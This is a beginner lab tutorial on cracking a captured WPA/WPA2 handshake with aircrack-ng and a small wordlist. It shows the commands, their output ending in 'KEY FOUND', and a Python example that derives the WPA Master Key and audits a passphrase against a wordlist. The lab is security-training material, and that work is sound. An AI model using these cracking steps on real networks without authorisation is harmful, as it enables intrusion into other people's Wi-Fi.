Perform a Dictionary Attack on a WPA Handshake with aircrack-ng

Beginner

Introduction

In this lab, you will learn how to perform a dictionary attack against a WPA/WPA2 handshake. When a device connects to a WPA/WPA2 protected Wi-Fi network, a 4-way handshake takes place to authenticate the device. By capturing this handshake, it's possible to try to crack the network's password offline, without interacting with the network again.

A dictionary attack is a method of breaking into a password-protected system by systematically entering every word in a list (called a dictionary or wordlist) as a password. We will use aircrack-ng, a powerful tool for Wi-Fi security auditing, to carry out this attack. You will be provided with a captured handshake file (.cap) and a wordlist to simulate a real-world scenario.

By the end of this lab, you will be able to use aircrack-ng to find a Wi-Fi password from a captured handshake file.

Locate the Captured Handshake .cap File

In this step, you will locate the pre-captured WPA handshake file. For this lab, a sample capture file named wpa_handshake.cap has been placed in your ~/project directory. This file contains the network traffic, including the essential 4-way handshake needed for the attack.

First, let's list the files in the current directory to confirm that the capture file is present. Use the ls -l command.

ls -l

You should see the wpa_handshake.cap file in the output, along with other files.

total 8
-rw-r--r-- 1 labex labex 11 Mar 25 10:00 rockyou.txt
-rw-r--r-- 1 labex labex 985 Mar 25 10:00 wpa_handshake.cap

Now that you have confirmed the presence of the capture file, you can proceed to the next step.

Find a Wordlist File such as rockyou.txt

In this step, you will find and inspect the wordlist file. A dictionary or wordlist is a simple text file that contains a list of potential passwords, one per line. aircrack-ng will use this list to test each password against the captured handshake.

A small wordlist named rockyou.txt has been created for you in the ~/project directory. Let's view its contents using the cat command.

cat rockyou.txt

The output will display the potential passwords contained in the file.

password
12345678
biscotte
qwerty

In a real-world scenario, wordlists can be massive, containing millions or even billions of passwords. For this lab, our small list contains the correct password, which will allow the attack to succeed quickly.

Construct the aircrack-ng Command with the .cap File

In this step, you will use aircrack-ng to inspect the capture file. Before launching the attack, it's good practice to check if the .cap file contains a valid WPA handshake. aircrack-ng can do this for you.

Run aircrack-ng and provide the capture file wpa_handshake.cap as an argument.

aircrack-ng wpa_handshake.cap

aircrack-ng will analyze the file and display information about the networks it finds.

Opening wpa_handshake.cap
Read 13 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.
Opening wpa_handshake.cap
Please specify a dictionary (option -w).

Pay close attention to the line WPA (1 handshake). This confirms that a complete WPA handshake for the network "teddy" was successfully captured and is present in the file. This is the confirmation we need to proceed with the dictionary attack. The tool also prompts you to specify a dictionary, which you will do in the upcoming steps.

Specify the Wordlist using the -w Parameter

In this step, you will learn how to specify a wordlist for the attack using the -w parameter. This parameter tells aircrack-ng which file to use as its dictionary of potential passwords.

The full command syntax is aircrack-ng <capture_file> -w <wordlist_file>.

To understand how it works, let's first try to run the command with a wordlist that does not exist. This will help you see how aircrack-ng handles errors. Try running the command with nonexistent.txt as the wordlist.

aircrack-ng wpa_handshake.cap -w nonexistent.txt

You will receive an error message because the file cannot be found.

Opening wpa_handshake.cap
Read 13 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.
Opening wpa_handshake.cap
The file 'nonexistent.txt' doesn't exist.
Please specify a dictionary (option -w).

This confirms that aircrack-ng requires a valid, existing file for the -w parameter. In the next step, you will use the correct wordlist file to run the attack.

Run the Attack and Analyze the 'KEY FOUND' Output

In this step, you will run the full dictionary attack with the correct wordlist and analyze the output to find the key. Now that you know how to specify the capture file and the wordlist, you can launch the attack.

Execute the aircrack-ng command, providing wpa_handshake.cap as the capture file and rockyou.txt as the wordlist.

aircrack-ng wpa_handshake.cap -w rockyou.txt

aircrack-ng will now start. It will test each password from rockyou.txt against the handshake. Since our wordlist is small and contains the correct password, the process will be very fast.

Opening wpa_handshake.cap
Read 13 packets.

   ##  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.
Opening wpa_handshake.cap
[00:00:00] 3 keys tested (23.08 k/s)


                                     KEY FOUND! [ biscotte ]


      Master Key     : ED A5 79 22 E5 5F 56 64 74 CB 89 98 44 6A 18 25
                       E0 E3 44 86 8A F3 89 84 55 4A D3 94 03 19 28 79

      Transient Key  : 6A 84 A9 58 52 2E 61 30 62 50 2B 88 46 1B 2A 8A
                       ...

      EAPOL HMAC     : 4E 1A E7 74 52 86 C5 29 A3 43 54 B2 1B 2D 34 18

The most important line in the output is KEY FOUND! [ biscotte ]. This indicates that the attack was successful. aircrack-ng tested the passwords from the wordlist and found that biscotte is the correct password for the "teddy" network.
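To make the Master Key line concrete, here is an added Python example; it is not part of the lab and not aircrack-ng's own code. It derives the WPA/WPA2-Personal Pairwise Master Key (PMK), the 32-byte value aircrack-ng prints as Master Key, with the standard PBKDF2-HMAC-SHA1 construction (4096 iterations, SSID as salt), walks a constructed copy of the lab's four-entry wordlist the way one dictionary pass does, and wraps the same check in a defender-side audit function that flags a proposed passphrase if it falls outside the 8 to 63 character limit WPA2-PSK imposes or is recovered from the wordlist. The SSID teddy and the candidate passphrases come from the lab output above; the function names, the SAMPLE_WORDLIST constant and the audit rules are assumptions of this example.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Constructed wordlist: the four entries the lab's rockyou.txt contains.
SAMPLE_WORDLIST = ["password", "12345678", "biscotte", "qwerty"]

PBKDF2_ITERATIONS = 4096   # fixed by the WPA/WPA2-Personal specification
PMK_LENGTH = 32            # bytes


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key from passphrase and SSID.

    WPA/WPA2-Personal defines PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).
    This 32-byte value is what aircrack-ng prints as 'Master Key'; the Transient
    Key and the EAPOL HMAC are derived from it together with handshake nonces.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH,
    )


def format_key(key: bytes) -> str:
    """Render bytes in the spaced uppercase hex layout aircrack-ng uses."""
    return " ".join(f"{b:02X}" for b in key)


def dictionary_pass(wordlist: Iterable[str], target_pmk: bytes, ssid: str) -> Tuple[Optional[str], int]:
    """Walk the wordlist as a dictionary pass does: one PBKDF2 derivation per
    candidate, compared against the target. Returns (match, candidates_tested).

    aircrack-ng checks each candidate against the captured EAPOL MIC rather than
    a known PMK, but the dominant per-candidate cost (4096 HMAC-SHA1 rounds) is
    the same, which is why its throughput is reported in k/s, not millions.
    """
    tested = 0
    for candidate in wordlist:
        tested += 1
        if derive_pmk(candidate, ssid) == target_pmk:
            return candidate, tested
    return None, tested


def audit_passphrase(passphrase: str, ssid: str, wordlist: Iterable[str]) -> dict:
    """Defender-side check for a proposed WPA2-Personal passphrase (hypothetical helper):
    - WPA2-PSK passphrases must be 8 to 63 printable ASCII characters;
    - a passphrase that a wordlist recovers is exactly what this lab cracked.
    """
    pmk = derive_pmk(passphrase, ssid)
    match, tested = dictionary_pass(list(wordlist), pmk, ssid)
    return {
        "length_ok": 8 <= len(passphrase) <= 63,
        "in_wordlist": match is not None,
        "candidates_tested": tested,
        "master_key": format_key(pmk),
    }


if __name__ == "__main__":
    for pw in ("biscotte", "correct horse battery staple"):
        print(pw, "->", audit_passphrase(pw, "teddy", SAMPLE_WORDLIST))
```

Running the audit on biscotte with the SSID teddy reports a wordlist hit after three candidates, the same count as the "3 keys tested" line in the lab output, because biscotte is the third entry in the list; a passphrase that is not in the wordlist makes the pass exhaust all four candidates and return no match. The check is only as good as the wordlist you feed it, so an audit should use the same large, public lists an attacker would.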

Summary

In this lab, you successfully performed a dictionary attack on a WPA handshake using aircrack-ng.

You learned how to:

  • Locate and identify a capture file (.cap) and a wordlist.
  • Use aircrack-ng to inspect a capture file and confirm the presence of a WPA handshake.
  • Use the -w parameter to specify a wordlist for the attack.
  • Execute the dictionary attack and interpret the results to find the network key.

This exercise demonstrates a fundamental technique in Wi-Fi security auditing and highlights the importance of using strong, complex passwords that are not easily guessed by dictionary attacks.